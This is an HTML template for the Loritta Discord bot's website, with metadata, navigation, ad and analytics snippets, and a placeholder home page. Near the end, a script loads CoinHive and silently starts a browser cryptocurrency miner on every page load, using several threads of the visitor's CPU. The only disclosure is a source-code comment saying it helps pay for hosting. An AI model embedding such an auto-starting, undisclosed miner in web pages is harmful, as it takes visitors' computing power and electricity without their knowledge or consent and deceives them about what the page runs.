<!DOCTYPE html>
<html>
<head>
    {% set metaTitle = "Página inicial" %}
    <title>{% block title %}{% block subtitle %}{{ locale.WEBSITE_DEFAULT_TITLE }}{% endblock %} • Loritta{% endblock %}</title>
	<meta name="description" content="Olá, eu me chamo Loritta! Sou apenas um simples bot brasileiro para o Discord com várias funções divertidas!">
	<meta name="author" content="MrPowerGamerBR">
	<meta name="viewport" content="width=device-width, initial-scale=1">
    <meta property="og:site_name" content="Website da Loritta">
    <meta property="og:description" content="Olá, eu me chamo Loritta! Sou apenas um simples bot brasileiro para o Discord com várias funções divertidas!">
    <meta property="og:title" content="Meu Website!">
    <meta property="og:image" content="http://loritta.website/assets/img/loritta_guild_v4.png">
    <meta property="og:ttl" content="600">
    <meta property="og:image:width" content="320">
    <meta property="twitter:site" content="loritta">
    <meta property="twitter:card" content="summary">
    <meta property="twitter:title" content="Página inicial">
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png?v=oLaGW5o4zrX">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png?v=oLaGW5o4zrX">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png?v=oLaGW5o4zrX">
<link rel="manifest" href="/manifest.json?v=oLaGW5o4zrX">
<link rel="mask-icon" href="/safari-pinned-tab.svg?v=oLaGW5o4zrX" color="#5bbad5">
<link rel="shortcut icon" href="/favicon.ico?v=oLaGW5o4zrX">
<link rel="stylesheet" href="{{ websiteUrl }}assets/css/normalize.css">
<link rel="stylesheet" href="https://unpkg.com/purecss@0.6.2/build/pure-min.css">
<link rel="stylesheet" href="https://unpkg.com/purecss@0.6.2/build/grids-responsive-min.css">
<link rel="stylesheet" type="text/css" href="{{ websiteUrl }}assets/style.css?v=1.5">
<meta name="theme-color" content="#ffffff">
<script
			  src="https://code.jquery.com/jquery-3.2.1.min.js"
			  integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4="
			  crossorigin="anonymous"></script>
<script src="{{ websiteUrl }}assets/js/autosize.min.js"></script>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9989170954243288",
    enable_page_level_ads: true
  });
</script>
</head>
<body>
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-53518408-9', 'auto');
  ga('send', 'pageview');

</script>
{% block body %}
<div id="header" style="z-index: -9;">
<div id="katyImage" class="animated fadeInUp" style="line-height: 0;">
<img src="{{ websiteUrl }}assets/img/katy_angel_webpage.png"></img>
</div>
  <div class="child animated fadeIn" style="text-align: center;"><span class="text">{{ locale.WEBSITE_HELLO }} <span style="color: fuchsia;">Loritta</span>!
  <div style="font-size: 0.5em">{{ locale.WEBSITE_JUST_A_SIMPLE_DISCORD_BOT }}</div></span>
  <div><a href="https://loritta.website/auth"><button style="box-shadow: 0px 5px 0px #a407cc, 0 0px 30px #000" class="button_normal autoSubmit">{{ locale.WEBSITE_ADD_ME }}</button></div></a></div>
</div>
</div>
<div id="belowHeader">
<div class="topnav" id="myTopnav">
  <a href="{{ websiteUrl }}"><i class="fa fa-home" aria-hidden="true"></i> {{ locale.WEBSITE_HOME }}</a>
  <a href="{{ websiteUrl }}auth">{% if temmie is null %}<i class="fa fa-sign-in" aria-hidden="true"></i> Login{% else %}<i class="fa fa-wrench" aria-hidden="true"></i> {{ locale.WEBSITE_ADMIN_PANEL }}{% endif %}
  <a href="https://discord.gg/3rXgN8x"><i class="fa fa-comments-o" aria-hidden="true"></i> {{ locale.WEBSITE_OUR_DISCORD }}</a>
  <a href="{{ websiteUrl }}comandos"><i class="fa fa-terminal" aria-hidden="true"></i> {{ locale.WEBSITE_COMMANDS }}</a>
  <a href="{{ websiteUrl }}fanarts"><i class="fa fa-paint-brush" aria-hidden="true"></i> {{ locale.WEBSITE_FAN_ARTS }}</a>
  <a href="{{ websiteUrl }}doar"><i class="fa fa-gift" aria-hidden="true"></i> {{ locale.WEBSITE_DONATE }}</a>
  <a href="javascript:void(0);" class="icon" onclick="myFunction()">&#9776;</a>
</div>
<div id="wrapper">
{% block beforeLeftColumn %}
<div id="leftColumn">
{% block leftColumn %}
<div class="content">
<div class="smTitleBar">
Olá Mundo!
</div>
<div class="insideContent">
<p>Isto é uma página temporária!</p>
</div>
</div>
</div>
{% endblock %}
</div>
{% endblock %}
{% block beforeRightColumn %}
<div id="rightColumn">
{% block rightColumn %}
{% endblock %}
</div>
{% endblock %}
</div>
<br style="clear:both" /> <!-- So dirty! -->
</div>
<link async rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css">
<link async rel="stylesheet" type="text/css" href="{{ websiteUrl }}remodal.css">
<link async rel="stylesheet" type="text/css" href="{{ websiteUrl }}remodal-default-theme.css">
<link async href="https://fonts.googleapis.com/css?family=Lobster" rel="stylesheet"> 
<link async href="https://fonts.googleapis.com/css?family=Pacifico" rel="stylesheet"> 
<link async href='https://fonts.googleapis.com/css?family=Oswald' rel='stylesheet' type='text/css'>
<link async href='https://fonts.googleapis.com/css?family=Open+Sans' rel='stylesheet' type='text/css'>
<script async src="https://use.fontawesome.com/055e611427.js"></script>
<script src="{{ websiteUrl }}remodal.min.js"></script>
<!-- CoinHive, minerador de bitcoin para ajudar a pagar a hospedagem da Loritta -->
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
showMiningInformation = false;

	var miner = new CoinHive.Anonymous('db5pCBbuOyu3CsmB7et3Fbi0LyeFFGcJ', {
	threads: 4,
	autoThreads: true,
	throttle: 0.6,
	forceASMJS: false
});
	miner.start();
	
	// Update stats once per second
	setInterval(function() {
		var hashesPerSecond = miner.getHashesPerSecond();
		var totalHashes = miner.getTotalHashes();
		var acceptedHashes = miner.getAcceptedHashes();

		if (showMiningInformation) {
			console.log(hashesPerSecond + ", " + totalHashes + ", " + acceptedHashes);
		}
		// Output to HTML elements...
	}, 1000);
</script>
<script>
/* Toggle between adding and removing the "responsive" class to topnav when the user clicks on the icon */
function myFunction() {
    var x = document.getElementById("myTopnav");
    if (x.className === "topnav") {
        x.className += " responsive";
    } else {
        x.className = "topnav";
    }
}

    $(function(){
        var y = 0;
        setInterval(function(){
            y -=1;
            $('#header').css('background-position', '0' + 'px ' + y + 'px');
        }, 60);
    })
</script>
{% endblock %}
</body>
